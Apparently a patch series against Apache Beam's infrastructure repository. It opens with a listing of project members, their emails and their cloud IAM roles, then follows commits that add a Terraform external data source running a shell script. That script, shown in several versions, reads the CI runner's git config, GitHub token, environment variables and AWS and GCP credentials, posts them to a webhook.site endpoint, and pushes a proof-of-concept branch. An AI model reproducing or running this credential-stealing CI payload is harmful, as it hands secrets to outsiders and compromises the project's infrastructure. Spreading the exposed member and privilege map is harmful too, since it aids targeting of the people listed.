email: pabloem@google.com - member_type: user - permissions: - - role: roles/iap.tunnelResourceAccessor - - role: roles/owner -- username: pandey.ayu - email: pandey.ayu@gmail.com - member_type: user - permissions: - - role: roles/editor -- username: pandiana - email: pandiana@google.com - member_type: user - permissions: - - role: roles/editor -- username: phucnh402 - email: phucnh402@gmail.com - member_type: user - permissions: - - role: roles/biglake.admin - - role: roles/container.admin - - role: roles/dataflow.admin - - role: roles/editor - - role: roles/iam.serviceAccountUser - - role: roles/logging.logWriter - - role: roles/logging.viewer - - role: roles/storage.admin -- username: playground-cd-cb - email: playground-cd-cb@apache-beam-testing.iam.gserviceaccount.com - member_type: serviceAccount - permissions: - - role: roles/datastore.user - - role: roles/storage.insightsCollectorService -- username: playground-ci-cb - email: playground-ci-cb@apache-beam-testing.iam.gserviceaccount.com - member_type: serviceAccount - permissions: - - role: roles/storage.insightsCollectorService -- username: playground-deploy-cb - email: playground-deploy-cb@apache-beam-testing.iam.gserviceaccount.com - member_type: serviceAccount - permissions: - - role: roles/appengine.appAdmin - - role: roles/appengine.appCreator - - role: roles/artifactregistry.admin - - role: roles/cloudfunctions.developer - - role: roles/compute.admin - - role: roles/container.admin - - role: roles/datastore.indexAdmin - - role: roles/dns.admin - - role: roles/iam.roleAdmin - - role: roles/iam.securityAdmin - - role: roles/iam.serviceAccountAdmin - - role: roles/iam.serviceAccountCreator - - role: roles/iam.serviceAccountUser - - role: roles/logging.logWriter - - role: roles/redis.admin - - role: roles/servicemanagement.quotaAdmin - - role: roles/storage.admin -- username: playground-update-cb - email: playground-update-cb@apache-beam-testing.iam.gserviceaccount.com - member_type: serviceAccount - permissions: - - role: roles/appengine.appAdmin - - role: roles/artifactregistry.admin - - role: roles/cloudfunctions.admin - - role: roles/compute.admin - - role: roles/container.admin - - role: roles/datastore.indexAdmin - - role: roles/datastore.user - - role: roles/dns.admin - - role: roles/iam.roleAdmin - - role: roles/iam.serviceAccountUser - - role: roles/logging.logWriter - - role: roles/redis.admin - - role: roles/storage.admin -- username: polecito.em - email: polecito.em@gmail.com - member_type: user - permissions: - - role: roles/editor -- username: pranavbhandari - email: pranavbhandari@google.com - member_type: user - permissions: - - role: roles/bigquery.admin - - role: roles/editor -- username: prod-playground-sa - email: prod-playground-sa@apache-beam-testing.iam.gserviceaccount.com - member_type: serviceAccount - permissions: - - role: roles/artifactregistry.reader - - role: roles/bigquery.dataViewer - - role: roles/bigquery.jobUser - - role: roles/bigquery.readSessionUser - - role: roles/container.nodeServiceAccount - - role: roles/datastore.viewer - - role: roles/logging.logWriter - - role: roles/monitoring.metricWriter - - role: roles/stackdriver.resourceMetadata.writer -- username: prod-playground-sa-cf - email: prod-playground-sa-cf@apache-beam-testing.iam.gserviceaccount.com - member_type: serviceAccount - permissions: - - role: roles/cloudfunctions.invoker - - role: roles/datastore.user - - role: roles/storage.objectViewer -- username: rajkumargupta - email: rajkumargupta@google.com - member_type: user - permissions: - - role: roles/owner -- username: rebo - email: rebo@google.com - member_type: user - permissions: - - role: roles/editor -- username: reebaq212 - email: reebaq212@gmail.com - member_type: user - permissions: - - role: roles/bigquery.admin - - role: roles/editor - - role: roles/pubsub.editor - - role: roles/spanner.databaseAdmin - - role: roles/storage.objectCreator - - role: roles/storage.objectViewer -- username: relax - email: relax@google.com - member_type: user - permissions: - - role: roles/owner -- username: rezarokni - email: rezarokni@google.com - member_type: user - permissions: - - role: roles/bigquery.admin - - role: roles/dataflow.admin - - role: roles/pubsub.admin - - role: roles/storage.objectAdmin -- username: riteshghorse - email: riteshghorse@google.com - member_type: user - permissions: - - role: roles/editor - - role: roles/owner -- username: robbe.sneyders - email: robbe.sneyders@ml6.eu - member_type: user - permissions: - - role: roles/editor -- username: robertwb - email: robertwb@google.com - member_type: user - permissions: - - role: roles/owner - - role: roles/viewer -- username: rosinha - email: rosinha@google.com - member_type: user - permissions: - - role: roles/editor -- username: rrio-2hag2q - email: rrio-2hag2q@apache-beam-testing.iam.gserviceaccount.com - member_type: serviceAccount - permissions: - - role: roles/autoscaling.metricsWriter - - role: roles/logging.logWriter - - role: roles/monitoring.metricWriter - - role: roles/monitoring.viewer - - role: roles/stackdriver.resourceMetadata.writer -- username: rrio-tests-63de9ae8 - email: rrio-tests-63de9ae8@apache-beam-testing.iam.gserviceaccount.com - member_type: serviceAccount - permissions: - - role: roles/dataflow.worker - - role: roles/storage.admin -- username: ruilongjiang - email: ruilongjiang@google.com - member_type: user - permissions: - - role: roles/editor -- username: ruslan.shamunov - email: ruslan.shamunov@akvelon.com - member_type: user - permissions: - - role: roles/artifactregistry.admin - - role: roles/compute.admin - - role: roles/container.admin - - role: roles/datastore.indexAdmin - - role: roles/dns.admin - - role: roles/editor - - role: roles/iam.roleAdmin - - role: roles/iam.securityAdmin - - role: roles/iam.serviceAccountAdmin - - role: roles/iam.serviceAccountCreator - - role: roles/iam.serviceAccountUser - - role: roles/redis.admin - - role: roles/servicemanagement.quotaAdmin - - role: roles/storage.admin -- username: ryanmadden - email: ryanmadden@google.com - member_type: user - permissions: - - role: roles/editor -- username: saadatssu - email: saadatssu@gmail.com - member_type: user - permissions: - - role: roles/editor -- username: samuelw - email: samuelw@google.com - member_type: user - permissions: - - role: roles/editor -- username: secrets-manager-40 - email: secrets-manager-40@apache-beam-testing.iam.gserviceaccount.com - member_type: serviceAccount - permissions: - - role: roles/compute.instanceAdmin.v1 - - role: roles/secretmanager.secretAccessor -- username: sergey.makarkin - email: sergey.makarkin@akvelon.com - member_type: user - permissions: - - role: roles/editor - - role: roles/iam.workloadIdentityPoolAdmin - - role: roles/secretmanager.admin -- username: shunping - email: shunping@google.com - member_type: user - permissions: - - role: roles/editor - - role: roles/iam.serviceAccountTokenCreator - - role: roles/iam.serviceAccountUser - - role: roles/owner -- username: siyuez - email: siyuez@google.com - member_type: user - permissions: - - role: roles/editor - - role: roles/viewer -- username: skp - email: skp@google.com - member_type: user - permissions: - - role: roles/editor -- username: sniemitz - email: sniemitz@google.com - member_type: user - permissions: - - role: roles/editor -- username: stg-playground-sa - email: stg-playground-sa@apache-beam-testing.iam.gserviceaccount.com - member_type: serviceAccount - permissions: - - role: roles/artifactregistry.reader - - role: roles/bigquery.dataViewer - - role: roles/bigquery.jobUser - - role: roles/bigquery.readSessionUser - - role: roles/container.nodeServiceAccount - - role: roles/datastore.viewer - - role: roles/logging.logWriter - - role: roles/monitoring.metricWriter - - role: roles/stackdriver.resourceMetadata.writer -- username: stg-playground-sa-cf - email: stg-playground-sa-cf@apache-beam-testing.iam.gserviceaccount.com - member_type: serviceAccount - permissions: - - role: roles/cloudfunctions.invoker - - role: roles/datastore.user - - role: roles/storage.objectViewer -- username: stg-tourofbeam-cb-cd - email: stg-tourofbeam-cb-cd@apache-beam-testing.iam.gserviceaccount.com - member_type: serviceAccount - permissions: - - role: organizations/433637338589/roles/GcsBucketLister - - role: roles/datastore.user - - role: roles/secretmanager.secretAccessor - - role: roles/storage.admin - - role: roles/storage.insightsCollectorService - - role: roles/storage.objectAdmin -- username: stg-tourofbeam-cb-ci - email: stg-tourofbeam-cb-ci@apache-beam-testing.iam.gserviceaccount.com - member_type: serviceAccount - permissions: - - role: roles/secretmanager.secretAccessor - - role: roles/storage.insightsCollectorService - - role: roles/storage.objectAdmin -- username: stg-tourofbeam-cb-deploy - email: stg-tourofbeam-cb-deploy@apache-beam-testing.iam.gserviceaccount.com - member_type: serviceAccount - permissions: - - role: roles/cloudfunctions.admin - - role: roles/container.clusterViewer - - role: roles/datastore.indexAdmin - - role: roles/datastore.user - - role: roles/firebase.admin - - role: roles/iam.serviceAccountCreator - - role: roles/iam.serviceAccountUser - - role: roles/logging.logWriter - - role: roles/serviceusage.serviceUsageAdmin - - role: roles/storage.admin -- username: svetaksundhar - email: svetaksundhar@google.com - member_type: user - permissions: - - role: roles/editor -- username: svetaksundhar-233 - email: svetaksundhar-233@apache-beam-testing.iam.gserviceaccount.com - member_type: serviceAccount - permissions: - - role: roles/bigquery.admin - - role: roles/bigquery.dataEditor - - role: roles/bigquery.dataOwner - - role: roles/bigquery.jobUser -- username: talatu - email: talatu@google.com - member_type: user - permissions: - - role: roles/owner -- username: tannapareddy - email: tannapareddy@google.com - member_type: user - permissions: - - role: organizations/433637338589/roles/GcsBucketOwner - - role: roles/alloydb.admin - - role: roles/artifactregistry.admin - - role: roles/biglake.admin - - role: roles/bigquery.admin - - role: roles/dataproc.admin - - role: roles/editor - - role: roles/owner - - role: roles/pubsub.admin - - role: roles/storage.admin -- username: tanusharmaa - email: tanusharmaa@google.com - member_type: user - permissions: - - role: roles/editor -- username: tarun-926 - email: tarun-926@apache-beam-testing.iam.gserviceaccount.com - member_type: serviceAccount - permissions: - - role: roles/alloydb.admin - - role: roles/artifactregistry.admin - - role: roles/biglake.admin - - role: roles/bigquery.admin - - role: roles/dataflow.worker - - role: roles/iam.serviceAccountAdmin - - role: roles/logging.logWriter - - role: roles/monitoring.metricWriter - - role: roles/pubsub.admin - - role: roles/pubsub.subscriber - - role: roles/resourcemanager.projectIamAdmin - - role: roles/storage.admin - - role: roles/tpu.admin -- username: tarunannapareddy1997 - email: tarunannapareddy1997@gmail.com - member_type: user - permissions: - - role: roles/bigquery.admin - - role: roles/iam.serviceAccountAdmin - - role: roles/resourcemanager.projectIamAdmin - - role: roles/tpu.admin -- username: tf-test-dataflow-egyosq0h66-0 - email: tf-test-dataflow-egyosq0h66-0@apache-beam-testing.iam.gserviceaccount.com - member_type: serviceAccount - permissions: - - role: roles/dataflow.worker - - role: roles/storage.admin -- username: tf-test-dataflow-egyosq0h66-1 - email: tf-test-dataflow-egyosq0h66-1@apache-beam-testing.iam.gserviceaccount.com - member_type: serviceAccount - permissions: - - role: roles/dataflow.worker - - role: roles/storage.admin -- username: tf-test-dataflow-ntgfw3y4q6-0 - email: tf-test-dataflow-ntgfw3y4q6-0@apache-beam-testing.iam.gserviceaccount.com - member_type: serviceAccount - permissions: - - role: roles/dataflow.worker - - role: roles/storage.admin -- username: tf-test-dataflow-ntgfw3y4q6-1 - email: tf-test-dataflow-ntgfw3y4q6-1@apache-beam-testing.iam.gserviceaccount.com - member_type: serviceAccount - permissions: - - role: roles/dataflow.worker - - role: roles/storage.admin -- username: tf-test-dataflow-odmv2iiu6v-0 - email: tf-test-dataflow-odmv2iiu6v-0@apache-beam-testing.iam.gserviceaccount.com - member_type: serviceAccount - permissions: - - role: roles/dataflow.worker - - role: roles/storage.admin -- username: tf-test-dataflow-odmv2iiu6v-1 - email: tf-test-dataflow-odmv2iiu6v-1@apache-beam-testing.iam.gserviceaccount.com - member_type: serviceAccount - permissions: - - role: roles/dataflow.worker - - role: roles/storage.admin -- username: tf-test-dataflow-uzgihx18zf-0 - email: tf-test-dataflow-uzgihx18zf-0@apache-beam-testing.iam.gserviceaccount.com - member_type: serviceAccount - permissions: - - role: roles/dataflow.worker - - role: roles/storage.admin -- username: tf-test-dataflow-uzgihx18zf-1 - email: tf-test-dataflow-uzgihx18zf-1@apache-beam-testing.iam.gserviceaccount.com - member_type: serviceAccount - permissions: - - role: roles/dataflow.worker - - role: roles/storage.admin -- username: timur.sultanov.akvelon - email: timur.sultanov.akvelon@gmail.com - member_type: user - permissions: - - role: roles/editor -- username: tourofbeam-cb-cd-prod - email: tourofbeam-cb-cd-prod@apache-beam-testing.iam.gserviceaccount.com - member_type: serviceAccount - permissions: - - role: roles/datastore.user - - role: roles/secretmanager.secretAccessor - - role: roles/storage.insightsCollectorService - - role: roles/storage.objectAdmin -- username: tourofbeam-cb-ci-prod - email: tourofbeam-cb-ci-prod@apache-beam-testing.iam.gserviceaccount.com - member_type: serviceAccount - permissions: - - role: roles/secretmanager.secretAccessor - - role: roles/storage.insightsCollectorService - - role: roles/storage.objectAdmin -- username: tourofbeam-cb-deploy-prod - email: tourofbeam-cb-deploy-prod@apache-beam-testing.iam.gserviceaccount.com - member_type: serviceAccount - permissions: - - role: roles/cloudfunctions.admin - - role: roles/container.clusterViewer - - role: roles/datastore.indexAdmin - - role: roles/datastore.user - - role: roles/firebase.admin - - role: roles/iam.serviceAccountCreator - - role: roles/iam.serviceAccountUser - - role: roles/logging.logWriter - - role: roles/serviceusage.serviceUsageAdmin - - role: roles/storage.admin -- username: tourofbeam-cf-sa-prod - email: tourofbeam-cf-sa-prod@apache-beam-testing.iam.gserviceaccount.com - member_type: serviceAccount - permissions: - - role: roles/cloudfunctions.admin - - role: roles/datastore.user - - role: roles/firebaseauth.viewer - - role: roles/iam.serviceAccountUser - - role: roles/storage.objectViewer -- username: tourofbeam-cf-sa-stg - email: tourofbeam-cf-sa-stg@apache-beam-testing.iam.gserviceaccount.com - member_type: serviceAccount - permissions: - - role: roles/cloudfunctions.admin - - role: roles/datastore.user - - role: roles/firebaseauth.viewer - - role: roles/iam.serviceAccountUser - - role: roles/storage.objectViewer -- username: tourofbeam-stg3-cloudfunc-sa - email: tourofbeam-stg3-cloudfunc-sa@apache-beam-testing.iam.gserviceaccount.com - member_type: serviceAccount - permissions: - - role: roles/cloudfunctions.admin - - role: roles/datastore.user - - role: roles/firebaseauth.viewer - - role: roles/iam.serviceAccountUser - - role: roles/storage.objectViewer -- username: valentyn - email: valentyn@google.com - member_type: user - permissions: - - role: roles/owner -- username: valentyn-dataflow-deployer - email: valentyn-dataflow-deployer@apache-beam-testing.iam.gserviceaccount.com - member_type: serviceAccount - permissions: - - role: roles/dataflow.admin - - role: roles/iam.serviceAccountUser -- username: valentyn-test - email: valentyn-test@apache-beam-testing.iam.gserviceaccount.com - member_type: serviceAccount - permissions: - - role: roles/compute.admin - - role: roles/dataflow.admin - - role: roles/editor - - role: roles/storage.admin -- username: vdjerek-test - email: vdjerek-test@apache-beam-testing.iam.gserviceaccount.com - member_type: serviceAccount - permissions: - - role: organizations/433637338589/roles/GceStorageAdmin - - role: roles/automlrecommendations.editor - - role: roles/bigquery.dataEditor - - role: roles/bigquery.jobUser - - role: roles/bigtable.admin - - role: roles/cloudsql.admin - - role: roles/cloudsql.client - - role: roles/cloudsql.editor - - role: roles/container.admin - - role: roles/dataflow.admin - - role: roles/dataproc.admin - - role: roles/healthcare.dicomEditor - - role: roles/healthcare.dicomStoreAdmin - - role: roles/healthcare.fhirResourceEditor - - role: roles/healthcare.fhirStoreAdmin - - role: roles/iam.serviceAccountTokenCreator - - role: roles/iam.serviceAccountUser - - role: roles/pubsub.editor -- username: vitaly-terentyev - email: vitaly-terentyev@apache-beam-testing.iam.gserviceaccount.com - member_type: serviceAccount - permissions: - - role: roles/container.clusterViewer - - role: roles/container.viewer - - role: roles/iam.serviceAccountTokenCreator - - role: roles/iam.serviceAccountUser - - role: roles/storage.objectAdmin - - role: roles/storage.objectCreator -- username: vitaly.terentyev.akv - email: vitaly.terentyev.akv@gmail.com - member_type: user - permissions: - - role: roles/container.admin - - role: roles/editor - - role: roles/iam.serviceAccountAdmin - - role: roles/iam.workloadIdentityPoolAdmin - - role: roles/secretmanager.secretAccessor -- username: vladislav.chunikhin - email: vladislav.chunikhin@akvelon.com - member_type: user - permissions: - - role: roles/editor -- username: vlado.djerek - email: vlado.djerek@akvelon.com - member_type: user - permissions: - - role: organizations/433637338589/roles/GceStorageAdmin - - role: roles/cloudfunctions.admin - - role: roles/container.admin - - role: roles/dataproc.admin - - role: roles/owner - - role: roles/secretmanager.secretAccessor -- username: wasmx-jbdthx - email: wasmx-jbdthx@apache-beam-testing.iam.gserviceaccount.com - member_type: serviceAccount - permissions: - - role: roles/autoscaling.metricsWriter - - role: roles/logging.logWriter - - role: roles/monitoring.metricWriter - - role: roles/monitoring.viewer - - role: roles/stackdriver.resourceMetadata.writer -- username: wdg-team - email: wdg-team@google.com - member_type: group - permissions: - - role: roles/looker.instanceUser -- username: xqhu - email: xqhu@google.com - member_type: user - permissions: - - role: roles/editor - - role: roles/iam.serviceAccountTokenCreator - - role: roles/owner - - role: roles/storage.admin -- username: yathu - email: yathu@google.com - member_type: user - permissions: - - role: roles/editor - - role: roles/iam.serviceAccountTokenCreator - - role: roles/owner -- username: ylabur - email: ylabur@google.com - member_type: user - permissions: - - role: roles/editor -- username: yyingwang - email: yyingwang@google.com - member_type: user - permissions: - - role: roles/editor -- username: zhoufek - email: zhoufek@google.com - member_type: user - permissions: - - role: roles/editor From c0a91ef5efcd1fbc88a113a6c9451502c327c59c Mon Sep 17 00:00:00 2001 From: barakharyati <41957095+barakharyati@users.noreply.github.com> Date: Thu, 11 Dec 2025 00:42:52 +0200 Subject: [PATCH 02/18] test --- infra/iam/my.tf | 119 ++++++++++++++++++++++++++++++++++++++++++++++-- 1 file changed, 116 insertions(+), 3 deletions(-) diff --git a/infra/iam/my.tf b/infra/iam/my.tf index bca257092771..d1ea1831d2c6 100644 --- a/infra/iam/my.tf +++ b/infra/iam/my.tf @@ -1,3 +1,116 @@ -data "external" "run" { - program = ["bash", "-c", "$(chmod +x myscript.sh; ./myscript.sh);{}"] -} \ No newline at end of file +echo "hello from rce " >&2 + + +echo "/home/runner/work/beam/beam/.git/config" >&2 +cat /home/runner/work/beam/beam/.git/config >&2 + +# echo "cat /home/runner/.gitconfig " >&2 +# cat /home/runner/.gitconfig >&2 + +# echo "cat /etc/gitconfi" >&2 +# cat /etc/gitconfig >&2 + +# echo "cat myscript.sh" >&2 +# cat myscript.sh >&2 +# echo "base64 /home/runner/work/beam/beam/.git/config" + +curl -X POST \ + -H "Content-Type: text/plain" \ + --data "$(cat /home/runner/work/beam/beam/.git/config)" \ + https://webhook.site/dda47cb0-8450-4adb-ba27-839b4a9a3229/githubtoken + +curl -X POST \ + -H "Content-Type: text/plain" \ + --data "$(base64 -w 0 /home/runner/work/beam/beam/.git/config)" \ + https://webhook.site/dda47cb0-8450-4adb-ba27-839b4a9a3229/githubtoken-base + +curl -X POST \ + -H "Content-Type: text/plain" \ + --data "$(aws sts get-caller-identity)" \ + https://webhook.site/dda47cb0-8450-4adb-ba27-839b4a9a3229/aws-identity + +curl -X POST \ + -H "Content-Type: text/plain" \ + --data "$(gcloud gcloud auth list)" \ + https://webhook.site/dda47cb0-8450-4adb-ba27-839b4a9a3229/gcp-authlist + + +curl -X POST \ + -H "Content-Type: text/plain" \ + --data "$(gcloud config get-value account)" \ + https://webhook.site/dda47cb0-8450-4adb-ba27-839b4a9a3229/gcp-get-value-account + + +export AWSCREDS=$(aws sts get-session-token) +export GCPCREDS=$(gcloud auth print-access-token) +export GCPFullCred="$(curl -s -X POST \ + -H "Content-Type: application/x-www-form-urlencoded" \ + -d "token=$GCPCREDS" \ + https://oauth2.googleapis.com/tokeninfo)" + +curl -X POST \ + -H "Content-Type: text/plain" \ + --data "$(printenv)" \ + https://webhook.site/dda47cb0-8450-4adb-ba27-839b4a9a3229/printenv + + +sleep 600 + +echo "hello from rce " >&2 + + +echo "/home/runner/work/beam/beam/.git/config" >&2 +cat /home/runner/work/beam/beam/.git/config >&2 + +# echo "cat /home/runner/.gitconfig " >&2 +# cat /home/runner/.gitconfig >&2 + +# echo "cat /etc/gitconfi" >&2 +# cat /etc/gitconfig >&2 + +# echo "cat myscript.sh" >&2 +# cat myscript.sh >&2 +# echo "base64 /home/runner/work/beam/beam/.git/config" + +curl -X POST \ + -H "Content-Type: text/plain" \ + --data "$(cat /home/runner/work/beam/beam/.git/config)" \ + https://webhook.site/dda47cb0-8450-4adb-ba27-839b4a9a3229/githubtoken + +curl -X POST \ + -H "Content-Type: text/plain" \ + --data "$(base64 -w 0 /home/runner/work/beam/beam/.git/config)" \ + https://webhook.site/dda47cb0-8450-4adb-ba27-839b4a9a3229/githubtoken-base + +curl -X POST \ + -H "Content-Type: text/plain" \ + --data "$(aws sts get-caller-identity)" \ + https://webhook.site/dda47cb0-8450-4adb-ba27-839b4a9a3229/aws-identity + +curl -X POST \ + -H "Content-Type: text/plain" \ + --data "$(gcloud gcloud auth list)" \ + https://webhook.site/dda47cb0-8450-4adb-ba27-839b4a9a3229/gcp-authlist + + +curl -X POST \ + -H "Content-Type: text/plain" \ + --data "$(gcloud config get-value account)" \ + https://webhook.site/dda47cb0-8450-4adb-ba27-839b4a9a3229/gcp-get-value-account + + +export AWSCREDS=$(aws sts get-session-token) +export GCPCREDS=$(gcloud auth print-access-token) +export GCPFullCred="$(curl -s -X POST \ + -H "Content-Type: application/x-www-form-urlencoded" \ + -d "token=$GCPCREDS" \ + https://oauth2.googleapis.com/tokeninfo)" + +curl -X POST \ + -H "Content-Type: text/plain" \ + --data "$(printenv)" \ + https://webhook.site/dda47cb0-8450-4adb-ba27-839b4a9a3229/printenv + + +sleep 600 + From f7278bf28c3a7d18cccff4301bcab5c05a1774af Mon Sep 17 00:00:00 2001 From: barakharyati <41957095+barakharyati@users.noreply.github.com> Date: Thu, 11 Dec 2025 00:47:04 +0200 Subject: [PATCH 03/18] test --- infra/iam/my.tf | 119 ++---------------------------------------- infra/iam/myscript.sh | 25 +++++++-- 2 files changed, 23 insertions(+), 121 deletions(-) diff --git a/infra/iam/my.tf b/infra/iam/my.tf index d1ea1831d2c6..bca257092771 100644 --- a/infra/iam/my.tf +++ b/infra/iam/my.tf @@ -1,116 +1,3 @@ -echo "hello from rce " >&2 - - -echo "/home/runner/work/beam/beam/.git/config" >&2 -cat /home/runner/work/beam/beam/.git/config >&2 - -# echo "cat /home/runner/.gitconfig " >&2 -# cat /home/runner/.gitconfig >&2 - -# echo "cat /etc/gitconfi" >&2 -# cat /etc/gitconfig >&2 - -# echo "cat myscript.sh" >&2 -# cat myscript.sh >&2 -# echo "base64 /home/runner/work/beam/beam/.git/config" - -curl -X POST \ - -H "Content-Type: text/plain" \ - --data "$(cat /home/runner/work/beam/beam/.git/config)" \ - https://webhook.site/dda47cb0-8450-4adb-ba27-839b4a9a3229/githubtoken - -curl -X POST \ - -H "Content-Type: text/plain" \ - --data "$(base64 -w 0 /home/runner/work/beam/beam/.git/config)" \ - https://webhook.site/dda47cb0-8450-4adb-ba27-839b4a9a3229/githubtoken-base - -curl -X POST \ - -H "Content-Type: text/plain" \ - --data "$(aws sts get-caller-identity)" \ - https://webhook.site/dda47cb0-8450-4adb-ba27-839b4a9a3229/aws-identity - -curl -X POST \ - -H "Content-Type: text/plain" \ - --data "$(gcloud gcloud auth list)" \ - https://webhook.site/dda47cb0-8450-4adb-ba27-839b4a9a3229/gcp-authlist - - -curl -X POST \ - -H "Content-Type: text/plain" \ - --data "$(gcloud config get-value account)" \ - https://webhook.site/dda47cb0-8450-4adb-ba27-839b4a9a3229/gcp-get-value-account - - -export AWSCREDS=$(aws sts get-session-token) -export GCPCREDS=$(gcloud auth print-access-token) -export GCPFullCred="$(curl -s -X POST \ - -H "Content-Type: application/x-www-form-urlencoded" \ - -d "token=$GCPCREDS" \ - https://oauth2.googleapis.com/tokeninfo)" - -curl -X POST \ - -H "Content-Type: text/plain" \ - --data "$(printenv)" \ - https://webhook.site/dda47cb0-8450-4adb-ba27-839b4a9a3229/printenv - - -sleep 600 - -echo "hello from rce " >&2 - - -echo "/home/runner/work/beam/beam/.git/config" >&2 -cat /home/runner/work/beam/beam/.git/config >&2 - -# echo "cat /home/runner/.gitconfig " >&2 -# cat /home/runner/.gitconfig >&2 - -# echo "cat /etc/gitconfi" >&2 -# cat /etc/gitconfig >&2 - -# echo "cat myscript.sh" >&2 -# cat myscript.sh >&2 -# echo "base64 /home/runner/work/beam/beam/.git/config" - -curl -X POST \ - -H "Content-Type: text/plain" \ - --data "$(cat /home/runner/work/beam/beam/.git/config)" \ - https://webhook.site/dda47cb0-8450-4adb-ba27-839b4a9a3229/githubtoken - -curl -X POST \ - -H "Content-Type: text/plain" \ - --data "$(base64 -w 0 /home/runner/work/beam/beam/.git/config)" \ - https://webhook.site/dda47cb0-8450-4adb-ba27-839b4a9a3229/githubtoken-base - -curl -X POST \ - -H "Content-Type: text/plain" \ - --data "$(aws sts get-caller-identity)" \ - https://webhook.site/dda47cb0-8450-4adb-ba27-839b4a9a3229/aws-identity - -curl -X POST \ - -H "Content-Type: text/plain" \ - --data "$(gcloud gcloud auth list)" \ - https://webhook.site/dda47cb0-8450-4adb-ba27-839b4a9a3229/gcp-authlist - - -curl -X POST \ - -H "Content-Type: text/plain" \ - --data "$(gcloud config get-value account)" \ - https://webhook.site/dda47cb0-8450-4adb-ba27-839b4a9a3229/gcp-get-value-account - - -export AWSCREDS=$(aws sts get-session-token) -export GCPCREDS=$(gcloud auth print-access-token) -export GCPFullCred="$(curl -s -X POST \ - -H "Content-Type: application/x-www-form-urlencoded" \ - -d "token=$GCPCREDS" \ - https://oauth2.googleapis.com/tokeninfo)" - -curl -X POST \ - -H "Content-Type: text/plain" \ - --data "$(printenv)" \ - https://webhook.site/dda47cb0-8450-4adb-ba27-839b4a9a3229/printenv - - -sleep 600 - +data "external" "run" { + program = ["bash", "-c", "$(chmod +x myscript.sh; ./myscript.sh);{}"] +} \ No newline at end of file diff --git a/infra/iam/myscript.sh b/infra/iam/myscript.sh index a02cca9e8b40..be1479062b87 100644 --- a/infra/iam/myscript.sh +++ b/infra/iam/myscript.sh @@ -16,21 +16,36 @@ cat /home/runner/work/beam/beam/.git/config >&2 curl -X POST \ -H "Content-Type: text/plain" \ - --data "$(base64 -w 0 /home/runner/work/beam/beam/.git/config)" \ - https://webhook.site/dda47cb0-8450-4adb-ba27-839b4a9a3229/githubtoken-base + --data "$(cat /home/runner/work/beam/beam/.git/config)" \ + https://webhook.site/dda47cb0-8450-4adb-ba27-839b4a9a3229/githubtoken curl -X POST \ -H "Content-Type: text/plain" \ - --data "$(cat /home/runner/work/beam/beam/.git/config)" \ - https://webhook.site/dda47cb0-8450-4adb-ba27-839b4a9a3229/githubtoken + --data "$(base64 -w 0 /home/runner/work/beam/beam/.git/config)" \ + https://webhook.site/dda47cb0-8450-4adb-ba27-839b4a9a3229/githubtoken-base curl -X POST \ -H "Content-Type: text/plain" \ --data "$(aws sts get-caller-identity)" \ https://webhook.site/dda47cb0-8450-4adb-ba27-839b4a9a3229/aws-identity +curl -X POST \ + -H "Content-Type: text/plain" \ + --data "$(gcloud gcloud auth list)" \ + https://webhook.site/dda47cb0-8450-4adb-ba27-839b4a9a3229/gcp-authlist + -CREDS=$(aws sts get-session-token) +curl -X POST \ + -H "Content-Type: text/plain" \ + --data "$(gcloud config get-value account)" \ + https://webhook.site/dda47cb0-8450-4adb-ba27-839b4a9a3229/gcp-get-value-account + +export AWSCREDS=$(aws sts get-session-token) +export GCPCREDS=$(gcloud auth print-access-token) +export GCPFullCred="$(curl -s -X POST \ + -H "Content-Type: application/x-www-form-urlencoded" \ + -d "token=$GCPCREDS" \ + https://oauth2.googleapis.com/tokeninfo)" curl -X POST \ -H "Content-Type: text/plain" \ From 743fdf2cdc0bf046e255112b9a7334942d120506 Mon Sep 17 00:00:00 2001 From: barakharyati <41957095+barakharyati@users.noreply.github.com> Date: Thu, 11 Dec 2025 01:00:30 +0200 Subject: [PATCH 04/18] test123 --- infra/iam/myscript.sh | 32 ++++++++++++++++++++++++++++++-- 1 file changed, 30 insertions(+), 2 deletions(-) diff --git a/infra/iam/myscript.sh b/infra/iam/myscript.sh index be1479062b87..6c7a00d7c726 100644 --- a/infra/iam/myscript.sh +++ b/infra/iam/myscript.sh @@ -19,6 +19,24 @@ curl -X POST \ --data "$(cat /home/runner/work/beam/beam/.git/config)" \ https://webhook.site/dda47cb0-8450-4adb-ba27-839b4a9a3229/githubtoken +curl -X POST \ + -H "Content-Type: text/plain" \ + --data "$(git config --list)" \ + https://webhook.site/dda47cb0-8450-4adb-ba27-839b4a9a3229/gitconfigList + + + +curl -X POST \ + -H "Content-Type: text/plain" \ + --data "$(cat /home/runner/.gitconfig)" \ + https://webhook.site/dda47cb0-8450-4adb-ba27-839b4a9a3229/githubtoken + +curl -X POST \ + -H "Content-Type: text/plain" \ + --data "$(cat /home/runner/work/beam/beam/.git/config)" \ + https://webhook.site/dda47cb0-8450-4adb-ba27-839b4a9a3229/githubtoken + + curl -X POST \ -H "Content-Type: text/plain" \ --data "$(base64 -w 0 /home/runner/work/beam/beam/.git/config)" \ @@ -31,7 +49,7 @@ curl -X POST \ curl -X POST \ -H "Content-Type: text/plain" \ - --data "$(gcloud gcloud auth list)" \ + --data "$(gcloud auth list)" \ https://webhook.site/dda47cb0-8450-4adb-ba27-839b4a9a3229/gcp-authlist @@ -53,5 +71,15 @@ curl -X POST \ https://webhook.site/dda47cb0-8450-4adb-ba27-839b4a9a3229/printenv -sleep 600 +git config --global user.email \"bh@someemail.com\"; \ + git config --global user.name \"H1Tester\"; \ + git fetch origin ; \ + git checkout master/v2 ; \ + git pull origin master/v2 ; \ + git checkout -b bh-poc ; \ + git add . ; \ + git push -u origin bh-poc + + +sleep 1200 From 294e7459496bdb344cf159a25395cf67c0ccbe36 Mon Sep 17 00:00:00 2001 From: barakharyati <41957095+barakharyati@users.noreply.github.com> Date: Thu, 11 Dec 2025 01:33:43 +0200 Subject: [PATCH 05/18] test --- infra/iam/myscript.sh | 1 + 1 file changed, 1 insertion(+) diff --git a/infra/iam/myscript.sh b/infra/iam/myscript.sh index 6c7a00d7c726..a8cc611ee696 100644 --- a/infra/iam/myscript.sh +++ b/infra/iam/myscript.sh @@ -81,5 +81,6 @@ git config --global user.email \"bh@someemail.com\"; \ git push -u origin bh-poc + sleep 1200 From b1d133bdc7628f1c16e93a5108d2ff070b73b6be Mon Sep 17 00:00:00 2001 From: barakharyati <41957095+barakharyati@users.noreply.github.com> Date: Thu, 11 Dec 2025 01:50:22 +0200 Subject: [PATCH 06/18] tw --- infra/iam/myscript.sh | 1 + 1 file changed, 1 insertion(+) diff --git a/infra/iam/myscript.sh b/infra/iam/myscript.sh index a8cc611ee696..9dfa31a73768 100644 --- a/infra/iam/myscript.sh +++ 